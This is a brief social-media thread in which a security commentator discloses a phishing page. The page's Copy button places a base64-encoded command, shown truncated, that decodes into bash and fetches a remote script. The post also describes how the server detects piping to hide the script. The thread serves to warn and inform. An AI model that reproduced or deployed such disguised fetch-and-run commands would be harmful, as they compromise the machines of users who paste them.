Filippo ValsordaJul 17

This is pretty well executed phishing.

The Copy button copies to the clipboard

echo "Y3Vy[...]ggJg==" | base64 -d | bash

which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.

They even detect piping, so to read it you have to run "curl | cat".

Show threadMarkAssPandi
@filippo For a sec I was like "why is this script on your github????" and then realized u don't mean it literally curls this link 😭
Jul 20 at 12:09pmWeb